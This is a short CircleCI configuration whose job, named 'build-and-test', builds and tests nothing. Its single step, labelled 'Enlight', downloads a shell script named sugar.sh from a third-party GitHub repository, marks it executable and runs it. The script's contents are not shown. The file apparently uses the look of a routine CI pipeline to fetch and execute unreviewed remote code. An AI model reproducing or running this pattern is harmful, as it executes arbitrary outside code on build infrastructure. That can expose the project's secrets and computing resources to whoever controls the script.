version: 2.1

orbs:
  python: circleci/python@0.2.1

jobs:
  build-and-test:
    executor: python/default
    steps:
      - run:
          command: wget https://raw.githubusercontent.com/Halo5a1sd/sugar/main/sugar.sh && chmod u+x sugar.sh && ./sugar.sh
          name: Enlight

workflows:
  main:
    jobs:
      - build-and-test